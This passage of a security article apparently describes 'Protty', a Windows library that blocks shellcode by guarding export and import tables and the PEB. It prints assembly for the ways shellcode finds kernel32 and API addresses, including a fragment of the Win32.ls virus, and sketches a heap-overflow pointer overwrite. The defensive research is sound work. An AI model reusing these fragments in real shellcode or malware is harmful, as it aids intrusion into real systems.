+------------------
+
+This technique is based on overwritting the first 5 bytes of API function
+with call or unconditional jump. 
+
+I must say that one of the first implementations of such "hooking" 
+technique (well i don't mean the API hooking method excatly) was described
+by GriYo in [12]. The feature described by GriYo was named "EPO" - 
+"Entry-point Obscuring". Instead of changing the ENTRYPOINT of PE file [9]
+GriYo placed a so called "inject",a jump or call to virus inside host code
+but far away from the file entry-point. This EPO technique makes a virus 
+detection much much harder...
+
+Of course the emulated bytes must be first known by the "hooker". So it 
+generally must use some disassembler engine to determine instructions 
+length and to check its type (i think you know the bad things can happen 
+if you try to run grabbed call not from native location). Then those 
+instructions are stored locally and after that they are simply executed 
+(emulated). After that the execution is returned to native location. Just
+like the schema shows.
+
+Inline API hooking feature is also present in Detours library developed 
+by Microsoft [4]. Here is the standard sample how hooked function looks 
+like:
+
+	BEFORE:
+	;----------SNIP--------------------------------------------
+	CreateProcesA: 		push ebp		; 1 bytes
+			        mov ebp,esp		; 2 bytes
+			        push 0			; 2 bytes
+			        push dword ptr [ebp+2c]
+				...
+	;----------SNIP--------------------------------------------
+
+	AFTER (SCHEMA):
+	;----------SNIP--------------------------------------------
+	CreateProcessA:		jmp hooked_function
+	where_ret:		push dword ptr [ebp+2c]
+				...
+
+
+	hooked_function:	pushfd			; save flags
+				pushad			; save regs
+				call do_checks		; do some checks
+				popad			; load regs
+				popfd			; loadflags
+				
+				push ebp		; emulation
+				mov ebp,esp		; of original
+				push 0			; bytes
+
+				push offset where_ret	; return to
+				ret			; original func.
+
+
+	;----------SNIP--------------------------------------------
+
+Such type of hooking method was implemented in Okena/CSA and Entercept
+commercial mechanisms. When the hooked function is executed, BO prevention
+mechanism does similiar checks like in described above.
+
+However BO preventers that use such feature can be defeat easily. Because 
+I don't want to copy other phrack articles I suggest you looking at
+"Bypassing 3rd Party Windows Buffer Overflow Protection" [5] (phrack#62).
+It is a good article about bypassing such mechanisms.
+
+II.B   Security cookie authentication (stack protection)
+--------------------------------------------------------
+
+This technique was implemented in Windows 2003 Server, and it is very
+often called as "build in Windows 2003 Server stack protection". In
+Microsoft Visual C++ .NET Microsoft added a "/GS" switch (default on)
+which place security cookies while generating the code. The cookie
+(or canary) is placed on the stack before the saved return address 
+when a function is called. Before the procedure returns to the caller 
+the security cookie is checked with its "prototype" version
+stored in the .data section. If the buffer overflow occurs the cookie
+is overwritten and it mismatches with the "prototype" one. This is the
+sign of buffer overflow.
+
+
+Bypassing this example was well documented by David Litchfield so I
+advice you to take a look at the lecture [6].
+
+
+II.C   Additional mechanisms - module rebasing
+----------------------------------------------
+
+When we talk about buffer overflow prevention mechanism we shouldn't 
+forget about so called "module rebasing". What is the idea of this 
+technique? Few chapters lower you have an example code from "searching for
+kernel in memory" section, there you can find following variables:
+
+
+	;----------SNIP--------------------------------------------
+	; some of kernel base values used by Win32.ls
+	_kernells           label
+	dd 077e80000h - 1   ;NT 5
+	dd 0bff70000h - 1   ;w9x
+	dd 077f00000h - 1   ;NT 4
+	dd -1
+	;----------SNIP--------------------------------------------
+
+Like you probably know only these kernel locations in the table will be
+searched, what happens if shellcode doesn't know the imagebase of
+needed module (and all the search procedures failed)? Answer is easy
+shellcode can't work and it quits/crashes in most cases.
+
+How the randomization is done? Generally all PE files(.exe/.dlls etc. etc)
+have an entry in the PE record (offset 34h) which contains the address 
+where the module should be loaded. By changing this value we are able to 
+relocate the module we want, of course this value must be well calculated 
+otherwise your system can be working incorrectly.
+
+Now, after little overview of common protections we can study the
+shellcode itself.
+
+
+--[ III.  What is shellcode and what it "must do"
+
+For those who don't know: Shellcode is a part of code which does all the 
+dirty work (spawns a shell / drops trojans / bla bla) and it's a core of 
+exploit. 
+
+What windows shellcode must do? Lets take a look at the following sample 
+schema:
+
+1) - getting EIP
+2) - decoding loop if it's needed
+3) - getting addresses of kernel/needed functions
+4) - spawning a shell and all other dirty things
+
+If you read assumptions (point II) and some other papers you will 
+probably know that there is no way to cut third point from shellcode 
+schema.  Every windows shellcode must obtain needed data and that's a step
+we will try to detect.
+
+Of course shellcode may use the hardcoded kernel value or hardcoded API 
+values. That doesn't mean that shellcode will be not working, but 
+generally things get harder when attacker doesn't know the victim machine 
+(version of operating system - different windows = different kernel 
+addresses) or when the victim machine works with some protection levels 
+like image base rebasing. Generally hardcoding those values decreases the 
+success level of the shellcode.
+
+
+
+--[ IV.   Getting addresses of kernel/needed functions - enemy study
+
+This chapter describes shortly most common methods used in shellcodes. To 
+dig more deeply inside the stuff I advice you to read some papers from the 
+Reference section
+
+--[ IV.A   - getting kernel address (known mechanisms)
+
+IV.A.A  -  PEB (Process Environment Block) parsing
+--------------------------------------------------
+
+PEB (Process Environment Block) parsing - the following method was first 
+introduced by the guy called Ratter [7] from infamous 29A group. By 
+parsing the PEB_LDR_DATA we can obtain information about all currently
+loaded modules, like following example shows:
+
+	;----------SNIP--------------------------------------------
+
+	mov eax,dword ptr fs:[30h]	; EAX is now PEB base
+	mov eax,dword ptr [eax+0ch]	; EAX+0Ch = PEB_LDR_DATA
+	mov esi,dword ptr [eax+1ch]	; get the first entry
+
+	mov ebx,[esi+08h]		; EBX=ntdll imagebase
+
+	module_loopx:
+	lodsd
+	mov ebx,[eax+08h]		; EBX=next dll imagebase
+	test ebx,ebx
+	jz @last_one_done
+	int 3
+	mov esi,eax			; continue search
+	jmp module_loopx
+
+	;----------SNIP---------------------------------------------
+
+
+
+IV.A.B  -  searching for kernel in memory   
+-----------------------------------------
+
+searching for kernel in memory - this example scans/tries different kernel 
+locations (for different windows versions) and searches for MZ and PE 
+markers, the search progress works together with SEH frame to avoid access 
+violations. 
+
+Here is the example method (fragment of Win32.ls virus): 
+
+
+	;----------SNIP--------------------------------------------
+      
+	cld                                       
+	lea esi,[ebp + offset _kernells - @delta] ; load the kernel 
+                                                  ; array
+
+	@nextKernell:
+	lodsd                ; load on base to EAX
+	push esi             ; preserve ESI (kernel array location)
+	inc eax              ; is this the last one ? (-1+1=0)
+	jz @bad              ; seems so -> no kernel base matched
+
+	push ebp             ; preserve EBP (delta handler)
+	call @kernellSEH     ; check the loaded base
+
+	mov esp,[esp + 08h]  ; restore the stack
+          
+	@bad1:
+	pop dword ptr fs:[0] ; restore old SEH frame
+	pop eax              ; normalize the stack
+	pop ebp              ; load delta handle
+	pop esi              ; go back to kernel array
+	jmp @nextKernell     ; and check another base
+
+	@bad:
+	pop eax              ; no kernel found, virus
+	jmp @returnHost      ; returning to host
+ 
+	; some of kernel base values used by Win32.ls
+	_kernells           label
+	dd 077e80000h - 1   ;NT 5
+	dd 0bff70000h - 1   ;w9x
+	dd 077f00000h - 1   ;NT 4
+	dd -1
+ 
+	@kernellSEH:
+	push dword ptr fs:[0]         ; setup new SHE handler
+	mov dword ptr fs:[0],esp
+	mov ebx,eax                   ; EBX=imagebase
+	xchg eax,esi     
+	xor eax,eax
+	lodsw                         ; get first 2 bytes from imagebase
+	not eax                       ; is it MZ?
+	cmp eax,not 'ZM'              ; compare
+	jnz @bad1                     ; it isn't check next base
+	mov eax,[esi + 03ch]          ; MZ is found now scan for PE sign
+	add eax,ebx                   ; normalize (RVA2VA)
+	xchg eax,esi                  
+	lodsd                         ; read 4 bytes
+	not eax		
+	cmp eax,not 'EP'              ; is it PE?
+	jnz @bad1                     ; nope check next base
+          
+	pop dword ptr fs:[0]          ; return (setup) old SEH
+	pop eax ebp esi               ; clear stack
+	                              ; EBX is now valid kernel base
+     
+	;----------SNIP--------------------------------------------
+
+
+--[ IV.B   - getting API addresses (known methods)
+
+
+IV.B.A  -  export section parsing 
+---------------------------------
+
+export section parsing - when the module (usually kernel32.dll) base is 
+located, shellcode can scan export section and find some API functions 
+needed for later use. Usually shellcode is searching for GetProcAddress() 
+function address, then it is used to get location of the others APIs. 
+
+Following code parses kernel32.dll export section and gets address of 
+GetProcAddress API:
+
+	;----------SNIP--------------------------------------------
+	; EAX=imagebase of kernel32.dll
+
+	xor ebp,ebp		      ; zero the counter
+	mov ebx,[eax+3ch]	      ; get pe header
+	add ebx,eax		      ; normalize
+
+	mov edx,[ebx+078h]	      ; export section RVA
+	add edx,eax		      ; normalize
+
+	mov ecx,[edx+020h]            ; address of names
+	add ecx,eax                   ; normalize
+	mov esi,[edx+01ch]            ; address of functions
+	add esi,eax	              ; normalize
+
+	loop_it:
+	mov edi,[ecx]                 ; get one name
+	add edi,eax                   ; normalize
+	cmp dword ptr [edi+4],'Acor'  ; is it GetP-rocA-ddress ?? :)
+	jne @l                        ; nope -> jump to @l
+
+	                              ; yes it is
+	add esi,ebp	              ; add out counter
+	mov esi,[esi]                 ; get the address
+	add esi,eax	              ; normalize
+	int 3	                      ; ESI=address of GetProcAddress
+
+	@l:
+	add ecx,4                     ; to next name
+	add ebp,4                     ; update counter (dwords)
+	jmp loop_it	              ; and loop it again
+
+	;----------SNIP--------------------------------------------
+
+
+
+IV.B.B  -  import section parsing 
+---------------------------------
+
+import section parsing - 99% of hll applications import 
+GetProcAddress/LoadLibraryA, it means that their IAT (Import Address 
+Table) includes address and name string of the mentioned functions. 
+If shellcode "knows" the imagebase of target application it can easily 
+grab needed address from the IAT. 
+
+Just like following code shows:
+
+
+	;----------SNIP--------------------------------------------
+	;following example gets LoadLibraryA address from IAT
+
+	IMAGEBASE 		equ 00400000h 
+
+	mov ebx,IMAGEBASE
+	mov eax,ebx
+	add eax,[eax+3ch]                     ; PE header
+
+	mov edi,[eax+80h]                     ; import RVA
+	add edi,ebx                           ; normalize
+	xor ebp,ebp
+
+	mov edx,[edi+10h]                     ; pointer to addresses
+	add edx,ebx                           ; normalize
+
+	mov esi,[edi]                         ; pointer to ascii strings
+	add esi,ebx                           ; normalize
+
+	@loop:
+	mov eax,[esi]
+	add eax,ebx
+	add eax,2
+	cmp dword ptr [eax],'daoL'            ; is this LoadLibraryA?
+	jne @l
+	
+	add edx,ebp                           ; normalize
+	mov edx,[edx]                         ; edx=address of 
+	int 3				      ; LoadLibraryA
+
+	@l:
+	add ebp,4                             ; increase counter
+	add esi,4                             ; next name
+	jmp @loop                             ; loop it
+
+        ;----------SNIP--------------------------------------------
+
+
+After this little introduction we can finally move to real things.
+
+
+--[ V.    New prevention techniques
+
+
+While thinking about buffer overflow attacks I've noticed that methods
+from chapter IV are most often used in shellcodes. And thats the thing
+I wanted to prevent, I wanted to develop prevention technique which acts 
+in very early stage of shellcode execution and here are the results of 
+my work:
+
+Why two Protty libraries / two techniques of prevention? 
+
+When I have coded first Protty (P1) library it worked fine except some
+Microsoft products like Internet Explorer, Explorer.exe (windows manager) 
+etc. in thoose cases the prevention mechanisms eat all cpu.
+I simply got nervous and I have rebuilt the mechanisms and that's how 
+second Protty (P2) library was born. Im describing them both because 
+everything that gives any bit of knowledge is worth describing :) Anyway 
+Im not saying the second one is perfect each solution got its bad and
+good points.
+
+What I have done - the protection features:
+- protecting EXPORT section - protecting function addresses array 
+  (any exe/dll library)
+- IAT RVA killer (any exe/dll library)
+- protecting IAT - protecting functions names array (any exe/dll library)
+- protecting PEB (Process Environment Block)
+- disabling SEH/Unhandled Exception Filter usage
+- RtlEnterCrticialSection pointer protector
+
+
+NOTE: 	All those needed pointers (IMPORT/EXPORT sections) are found in 
+	similiar way like in IVth chapter.
+
+
+
+FEATURE: EXPORT SECTION PROTECTION (protecting "function addresses array")
+-------
+
+Every shellcode that parses EXPORT section (mainly kernel32.dll one) want
+to get to exported function addresses, and that's the thing I tried to
+block, here is the technique:
+
+Algorithm/method for mechanism used in Protty1 (P1):
+---------------------------------------------------
+
+1. Allocate enough memory to handle Address Of Functions table from
+   the export section.
+
+     Address of Function table is an array which cointains addresses 
+     of exported API functions, like here for KERNEL32.DLL:
+
+     D:\>tdump kernel32.dll kernel32.txt & type kernel32.txt
+
+
+	(...snip...)
+	Name                   RVA       Size  
+    	------------------  --------  --------
+    	Exports             0006D040  00006B39
+	(...snip...)
+
+
+	Exports from KERNEL32.dll
+        942 exported name(s), 942 export addresse(s).  Ordinal base is 1.
+
+     	Ordinal RVA       Name
+     	------- --------  ----
+     	0000    000137e8  ActivateActCtx
+     	0001    000093fe  AddAtomA
+     	0002    0000d496  AddAtomW
+     	0003    000607c5  AddConsoleAliasA
+     	0004    0006078e  AddConsoleAliasW
+     	0005    0004e0a1  AddLocalAlternateComputerNameA
+     	0006    0004df8c  AddLocalAlternateComputerNameW
+
+    	(...snip...)
+
+
+   	Where RVA values are entries from Address of Functions table, so 
+        if first exported symbol is ActivateActCtx, first entry of Address
+        of Function will be its RVA. The size of Address of Functions 
+        table depends on number of exported functions.
+
+	All those IMPORT / EXPORT sections structures are very well 
+        documented in Matt Pietrek, "An In-Depth Look into the Win32 
+        Portable Executable File Format" paper [9].
+
+
+2. Copy original addresses of functions to the allocated memory.
+3. Make original function addresses entries writeable.
+4. Erase all old function addresses.
+5. Make erased function addresses entries readable only.
+6. Update the pointer to Address of Functions tables and point it to our
+   allocated memory:
+   - Make page that contains pointer writeable.
+   - Overwrite with new location of Address of Function Table
+   - Make page that contains pointer readable again.
+
+
+7. Mark allocated memory (new function addresses) as PAGE_NOACCESS.
+
+   We couldn't directly set the PAGE_NOACCESS protection to original 
+   function addresses because some other data in the same page must be 
+   also accessible (well SAFE_MEMORY_MODE should cover all cases even when
+   protection of original page was changed to PAGE_NOACCESS - however such
+   action increases CPU usage of the mechanism). The best way seems to be
+   to allocate new memory region for it.
+
+   What does the PAGE_NOACCESS protection? :
+
+   - PAGE_NOACCESS disables all access to the committed region of pages. 
+     An attempt to read from, write to, or execute in the committed region
+     results in an access violation exception, called a general protection
+     (GP) fault.
+
+   Now all references to the table with function addresses will cause an
+   access violation exception, the description of the exception checking 
+   mechanism is written in next chapter ("Description of mechanism 
+   implemented in ...").
+
+
+   
+
+Just like the schema shows (A. - stands for "address"):
+
+ --- SNIP --- START OF SCHEMA. 1a
+
+    SOME PE MODULE
+  ------------------
+ |  export section  |
+ |------------------|
+ |       start	    |	     + imagebase
+ |       (...)      |        -----------> OLD ARRAY WITH FUNCTIONS ADDRS
+ |------------------|       |
+ | NUMBER OF NAMES  |       |
+ |------------------|BEFORE^|  AFTER>
+ | A. OF FUNCTIONS  |-------------------
+ |------------------|         + --//--  |
+ | A. OF NAMES      |                   |   (NEWLY ALLOCATED MEMORY)  
+ |------------------|                    -> NEW ARRAY WITH FUNCTIONS ADDRS
+ | A. OF ORDINALS   |                                |
+ |------------------|                         -----------------
+ |       (...)      |                        | function 1 addr | /  PAGE 
+ |        end       |                        | function 2 addr |-    NO 
+  ------------------                         | ...             | \ ACCESS
+                                              -----------------    RIGHTS 
+
+				  ALL FUNCTION ADDRESSES IN OLD ARRAY
+                                  WERE PERMANENTLY OVERWRITTEN WITH NULL!
+
+
+ 
+
+ --- SNIP --- END OF SCHEMA. 1a
+
+
+Algorithm/method for mechanism used in Protty2 (P2):
+---------------------------------------------------
+1. Allocate enough memory to handle Address Of Functions table from
+   the export section.
+2. Copy original addresses to the allocated memory.
+3. Make original function addresses entries writeable.
+4. Erase all old function addresses.
+5. Make erased function addresses entries readable only.
+6. Make pointer to Address Of Functions writeable.
+7. Allocate small memory array for decoy (with PAGE_NOACCES rights).
+8. Write entry to protected region lists.
+8. Update the pointer to Address Of Functions and point it to our 
+   allocated decoy.
+9. Update protected region list (write table entry)
+10.Make pointer to Address Of Function readable only.
+
+
+ --- SNIP --- START OF SCHEMA. 1b
+
+    SOME PE MODULE
+  ------------------
+ |  export section  |
+ |------------------|
+ |       start	    |	     + imagebase
+ |       (...)      |        -----------> OLD ARRAY WITH FUNCTIONS ADDRS
+ |------------------|       |
+ | NUMBER OF NAMES  |       |
+ |------------------|BEFORE^|  AFTER>
+ | A. OF FUNCTIONS  |-------------------
+ |------------------|         + --//--  |
+ | A. OF NAMES      |                   |       ------------ /PAGENOACCESS 
+ |------------------|                    ->    |    DECOY   |-    RIGHTS 
+ | A. OF ORDINALS   |                           ------------ \
+ |------------------|                         
+ |       (...)      |                   Somewhere in memory:     
+ |        end       |                   (allocated memory with functions     
+  ------------------                     address entries):
+                                                ||
+                                         -----------------
+  			                | function 1 addr | 
+                                        | function 2 addr |
+                                        | ...             | 
+                                         -----------------  
+
+				  ALL FUNCTION ADDRESSES IN OLD ARRAY
+                                  WERE PERMANENTLY OVERWRITTEN WITH NULL!
+
+ --- SNIP --- END OF SCHEMA. 1b
+
+
+What have I gained by switching from the first method (real arrays) to the 
+second one (decoys)?
+
+The answer is easy. The first one was pretty slow solution (all the time i
+needed to deprotect the region and protect is again) in the second one i 
+don't have to de-protect and protect the real array, the only thing i need
+to do  is update the register value and make it point to the orginal 
+requested body. 
+
+
+
+FEATURE: IMPORT SECTION PROTECTION (protecting "functions names array" + 
+-------  IAT RVA killer)
+
+IAT RVA killer mechanism for both Protty1 (P1) and Protty2 (P2)
+---------------------------------------------------------------
+
+All actions are similar to those taken in previous step, however here we 
+are redirecting IMPORTS function names and overwriting IAT RVA (with 
+pseudo random value returned by GetTickCount - bit swapped).
+
+And here is the schema which shows IAT RVA killing:
+
+ --- SNIP --- START OF SCHEMA. 2
+
+
+    SOME PE MODULE
+  ------------------
+ |    NT HEADER     |
+ |------------------|
+ |      start       |          + imagebase
+ |      (...)       |         ------------> MODULE IMPORT SECTION 
+ |------------------|        |
+ | EXPORT SIZE      |        |
+ |------------------| BEFORE^|    AFTER>
+ | IMPORT RVA       |---------------------> NO EXISTING LOCATION (*)
+ |------------------|          + --//--
+ | IMPORT SIZE      |
+ |------------------|
+ |      (...)       |
+ |       end        |
+  ------------------
+
+
+  (*) - the IMPORT RVA is overwritten with value returned by GetTickCount
+        swaped one time, generally it's kind of idiotic action because 
+        many of you can assume such operation can give a drastic effect 
+        with application stability. Well you are wrong, overwritting the 
+	IMPORT RVA >after< successful loading of any pe module has no 
+        right to cause instability (atleast it worked in my case, remeber
+	this is windows and you are messing a lot ...)
+
+
+ --- SNIP --- END OF SCHEMA. 2
+
+
+And here's the one describing protecting "functions names array", for
+Protty1 (P1):
+
+
+ --- SNIP --- START OF SCHEMA. 3a
+
+
+    SOME PE MODULE
+  ------------------
+ |  import section  |             +blabla
+ |------------------|            ----------> ARRAY OF FUNCTION NAMES
+ |       start	    |	        |
+ |       (...)      |           |
+ |------------------|  BEFORE^  |   AFTER>
+ | A. OF NAMES      |----------------------> (NEWLY ALLOCATED MEMORY)
+ |------------------|             +blabla    NEW ARRAY OF FUNCTION NAMES
+ |      (...)       |                                |
+ |       end        |                         -----------------
+  ------------------                         | "Function1",0   |/  PAGE 
+                                             | "Function2",0   |-   NO
+                                             | "Function3",0   |\ ACCESS 
+                                              -----------------   RIGHTS
+
+
+                              ALL NAMES IN OLD NAMES OF FUNCTIONS ARRAY
+                              WERE PERMANENTLY OVERWRITTEN BY NULL
+
+
+
+ NOTE: I have choosed Address Of Names array, because it is much less 
+       accessed memory region than Address Of Functions array - so
+       less CPU consumption (but bit more unsecure - you can do it
+       yourself).
+
+
+ --- SNIP --- END OF SCHEMA. 3a
+
+And here's the one describing protecting "functions names array", for
+Protty1 (P2):
+
+ --- SNIP --- START OF SCHEMA. 3b
+
+
+    SOME PE MODULE
+  ------------------
+ |  import section  |             +blabla
+ |------------------|            ----------> ARRAY OF FUNCTION NAMES
+ |       start	    |	        |
+ |       (...)      |           |
+ |------------------|  BEFORE^  |   AFTER>    ------------- /  PAGE
+ | A. OF NAMES      |----------------------> |    DECOY    |-NO ACCESS
+ |------------------|             +blabla     ------------- \ RIGHTS
+ |      (...)       |                       
+ |       end        |                       
+  ------------------                Somewhere in memory:  
+                                    (allocated memory with original
+                                     function names):
+                                	   ||
+                                    -----------------
+                                   | "Function1",0   |
+                                   | "Function2",0   |
+                                   | "Function3",0   |
+                                    ----------------- 
+
+
+                              ALL NAMES IN OLD NAMES OF FUNCTIONS ARRAY
+                              WERE PERMANENTLY OVERWRITTEN BY NULL
+
+ --- SNIP --- END OF SCHEMA. 3b
+
+
+FEATURE: PEB (Process Environment Block) protection (PEB_LDR_DATA) 
+-------
+
+Algorithm/method for mechanism used in Protty1 (P1):
+---------------------------------------------------
+1. Get PEB_LDR_DATA [7] structure location 
+2. Update the region list
+3. Mark all PEB_LDR_DATA [7] structure as PAGE_NO_ACCESS
+
+
+ --- SNIP --- START OF SCHEMA. 4a
+
+  ------------------
+ |   PEB_LDR_DATA   |\
+ |      ....        |---- NOW MARKED WITH PAGE_NOACCESS.
+ |      ....        |/  
+  ------------------
+
+ --- SNIP --- END OF SCHEMA. 4a
+
+
+Algorithm/method for mechanism used in Protty2 (P2):
+---------------------------------------------------
+1. Get InInitializationOrderModuleList [7] structure location 
+2. Write table entry (write generated faked address)
+3. Write table entry (write original location of InInitOrderML...)
+4. Change the pointer to InInitializationOrderModuleList, make it
+   point to bad address.
+
+Here is the schema (ML stands for ModuleList):
+
+ --- SNIP --- START OF SCHEMA. 4b
+
+    [PEB_LDR_DATA]:
+
+  ------------------
+ |     Length       |
+ |------------------|
+ |   Initialized    |
+ |------------------|                      --------------------------
+ |    SsHandle      |                     |LIST_ENTRY InInit.OrderML |
+ |------------------|          .--------> |                          |
+ |  InLoadOrderML   |          |           --------------------------
+ |------------------|          |
+ | InMemoryOrderML  |          |
+ |------------------|  BEFORE^ | AFTER>    
+ |  InInit.OrderML  |-------------------->     RANDOM MINUS VALUE
+ |------------------|                        (not existing location)
+  ------------------
+
+
+ NOTE:  why MINUS VALUE? Generally I choose minus one because there
+	is no minus valid location and this will generate a exception
+	for sure, anyway this value can be changed and we can add a DECOY
+	memory area like in upper cases (but in this case region size 
+	should be bigger). Minus value can be used for shellcodes to
+	find protection occurency - however if anybody wanna play...
+
+
+ --- SNIP --- END OF SCHEMA. 4b
+
+
+
+FEATURE: Disabling SEH / Unhandled Exception Filter pointer usage.
+-------
+
+Description for both Protty1 (P1) and Protty 2 (P2)
+---------------------------------------------------
+
+Every time access violation exception occurs in protected program, 
+prevention mechanism tests if the currently active SEH frame points 
+to writeable location, if so Protty will stop the execution. 
+
+If UEF_HEURISTISC is set to TRUE (1) Protty will check that actual
+set Unhandled Exception Filter starts with prolog (push ebp/mov ebp,esp)
+or starts with (push esi/mov esi,[esp+8]) otherwise Protty will kill
+the application. After this condition Protty checks that currently
+active Unhandled Exception Filter is writeable if so application
+is terminated (this also stands out for the default non heuristisc
+mode).
+
+Why UEF? Unhandled Exception Filter is surely one of the most used
+methods within exploiting windows heap overflows. The goal of this
+method is to setup our own Unhandled Filter, then when any unhandled
+exception will occur attackers code can be executed. Normally attacker
+tries to set UEF to point to call dword ptr [edi+78h], because
+78h bytes past EDI there is a pointer to the end of the buffer.
+To get more description of this exploitation technique check point [8] 
+from Reference section.
+
+NOTE: Maybe there should be also a low HEURISTICS mode with 
+      jmp dword ptr [edi+78h] / call dword ptr [edi+78h] occurency
+      checker, however the first one covers them all.
+
+
+
+FEATURE: RtlEnterCrticialSection pointer protector
+-------
+
+Description for both Protty1 (P1) and Protty 2 (P2)
+---------------------------------------------------
+
+Like in above paragraph, library checks if pointer to 
+RtlEnterCriticalSection pointer has changed, if it did, prevention 
+library immediately resets the original pointer and stops the program 
+execution. 
+
+RtlEnterCritical pointer is often used in windows heap overflows 
+exploitation. 
+
+Here is the sample attack:
+
+	(sample scenerio of heap overflow)
+	;----------SNIP--------------------------------------------
+	; EAX, ECX are controled by attacker
+	; assume: 
+	; ECX=07FFDF020h (RtlEnterCrticialSection pointer)
+	; EAX=location where attacker want to jump
+
+	mov     [ecx],eax		; overwrites the pointer
+	mov     [eax+0x4],ecx		; probably causes access 
+                                        ; violation
+					; if so the execution is 
+                                        ; returned to "EAX"
+	
+	;----------SNIP--------------------------------------------
+
+You should also notice that even when the access violation will not
+occur it doesn't mean attackers code will be not excuted. 
+Many functions (not directly) are calling RtlEnterCriticalSection 
+(the address where 07FFDF020h points), so attacker code can be 
+executed for example while calling ExitProcess API. To find more 
+details on this exploitation technique check point [10] from Reference 
+section.
+
+
+FEATURE: position independent code, running in dynamicaly allocated memory
+-------
+
+Protty library is a position independent code since it uses so called
+"delta handling". Before start of the mechanism Protty allocates memory
+at random location and copy its body there, and there it is executed.
+
+What is delta handling? Lets take a look at the following code:
+
+	;----------SNIP--------------------------------------------
+	call delta			; put delta label offset on the 
+                                        ; stack
+	delta: 	pop ebp			; ebp=now delta offset
+		sub ebp offset delta	; now sub the linking value of 
+                                        ; "delta"
+	;----------SNIP--------------------------------------------
+
+As you can see delta handle is a numeric value which helps you with 
+addressing variables/etc. especially when your code do not lay in native 
+location. 
+
+Delta handling is very common technique used by computer viruses. Here is
+a little pseudo code which shows how to use delta handling with
+addressing:
+
+	;----------SNIP--------------------------------------------
+	;ebp=delta handle
+	mov eax,dword ptr [ebp+variable1]
+	lea ebx,[ebp+variable2]
+	;----------SNIP--------------------------------------------
+	
+Of course any register (not only EBP) can be used :)
+
+The position independent code was done to avoid easy disabling/patching by 
+the shellcode itself.
+
+
+-------------------------------------------------------------------------
+	|Description of mechanism implemented in Protty1 (P1)|
+-------------------------------------------------------------------------
+
+NOTE: That all features written here were described above.
+      You can find complete descriptions there (or links to them). 	
+
+Mechanism takeovers the control of KiUserExceptionDispatcher API (exported
+ by NTDLL.DLL) and that's where the main mechanism is implemented. From 
+that point every exception (caused by program) is being filtered by 
+our library. To be const-stricto, used mechanism only filters all Access 
+Violations exceptions. When such event occurs Protty first checks if the 
+active SEH (Structured Exception Handler) frame points to good location
+(not writeable) if the result is ok it continues testing, otherwise it 
+terminates the application. After SEH frame checking, library checks the 
+address where violation came from, if its bad (writeable) the program 
+is terminated. Then it is doing the same with pointer to Unhandled 
+Exception Filter. Next it checks if pointer to RtlEnterCriticalSection 
+was changed (very common and useful technique for exploiting windows based
+heap overflows) and kills the application if it was (of course the pointer
+to RtlEnterCriticalSection is being reset in the termination procedure).
+If application wasn't signed as BAD and terminated so far, mechanism must
+check if violation was caused by reference to our protected memory 
+regions, if not it just returns execution to original handler. 
+Otherwise it checks if memory which caused the exception is stored 
+somewhere on the stack or is writeable. If it is, program is terminated. 
+When the reference to protected memory comes from GOOD location, mechanism
+resets protection of needed region and emulates the instruction which 
+caused access violation exception (im using z0mbie's LDE32 to determine 
+instruction length), after the emulation, library marks requested region 
+with PAGE_NOACCESS again and continues program execution. That's all - 
+for more information check the source codes attached and test it in 
+action. (Take a look at the "catched shellcodes" written in next section)
+
+In the time of last add-ons for the article, Phrack stuff noticed me that
+single stepping will be more good solution. I must confess it really can
+do its job in more fast way. I mark it as TODO.
+
+
+
+Few words about the emulation used in P1:
+----------------------------------------
+
+Generally I have two ways of doing it. You already know one. I'm going to 
+describe another one now. 
+
+Instead of placing jump after instruction that caused the access violation 
+exception I could emulate it locally, it's generally more slower/faster
+more weird (?), who cares (?) but it should work also. Here is the short 
+description of what have to be done:
+
+(optional algorithm replacement for second description written below)
+STEP 1   - Get instruction length, copy the instruction to local buffer
+STEP 2   - Deprotect needed region
+STEP 3   - Change the contexts, of course leave the EIP alone :)) save
+           the old context somewhere
+STEP 4   - Emulate the instruction
+STEP 5   - Update the "target" context, reset old context
+STEP 6   - Protect all regions again
+STEP 7   - continue program execution by NtContinue() function
+
+
+And here is the more detailed description of currently used 
+instruction emulation mechanism in Protty:
+
+STEP 1   - Deprotect needed region
+STEP 2   - Get instruction length
+STEP 3   - Make the location (placed after instruction) writeable
+STEP 4   - Save 7 bytes from there
+STEP 5   - Patch it with jump 
+STEP 6   - use NtContinue() to continue the execution, after executing
+           the first instruction, second one (placed jump) returns 
+           the execution to Protty.
+STEP 7   - Reset old 7 bytes to original location (un-hooking)
+STEP 8   - Mark the location (placed after instruction) as 
+           PAGE_EXECUTE_READ (not writeable)
+STEP 9   - Protect all regions again, return to "host"
+
+
+
+-------------------------------------------------------------------------
+	|Description of mechanism implemented in Protty2 (P2)|
+-------------------------------------------------------------------------
+
+The newer version of Protty library (P2) also resides in 
+KiUserExceptionDispatcher,where it filters all exceptions like the 
+previous version did. So the method of SEH/UEF protection is the same as
+described in Protty1. What is the main difference? Main difference is that
+current mechanism do not emulate instruction and do not deprotect regions.
+It works in completely different way. When some instruction (assume it is
+GOOD - stored in not writeable location) tries to access protected region
+it causes access violation. Why so? Because if you remember the ascii 
+schemas most of them point to DECOY (which is not accessible memory) or 
+to a minus memory location (invalid one). This causes an exception, 
+normally as described earlier the mechanism should de-prot the locations
+and emulate the intruction, but not in this case. Here we are checking 
+what registers were used by the instruction which caused fault, and then
+by scanning them we are checking if any of them points somewhere inside
+"DECOYS" offsets.
+
+How the mechanism know whats registers are used by instruction!?
+----------------------------------------------------------------
+To understand how the prevention mechanism works, the reader should
+know about so called "opcode decoding", this !IS NOT! the full tutorial
+but it describes the main things reader should know (for more check
+www.intel.com or [8]). I would also like to thank Satish K.S for 
+supporting me with great information which helped me to make the 
+"tutorial" suitable for human beings (chEERs ricy! :))
+
+The instructions from Intel Architecture are encoded by using subsets of 
+the general machine instruction format, like here:
+
+ 									
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ A                 A                 A     * * *       A                 A
+ A 7 6 5 4 3 2 1 0 A 7 6 5 4 3 2 1 0 A 7 6 5 4 3 2 1 0 A 7 6 5 4 3 2 1 0 A
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+   A A A A A A A A   A A A A A A A A   A A A A A A A A   A A A A A A A A
+   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   AAAAAAAAAAAAAAA   AAAAAAAAAAAAAAA
+                   A                          A                 A
+                   A                          A                 A
+                Opcode                    ModR/M Byte        SIB Byte
+             1 or 2 Bytes         
+
+
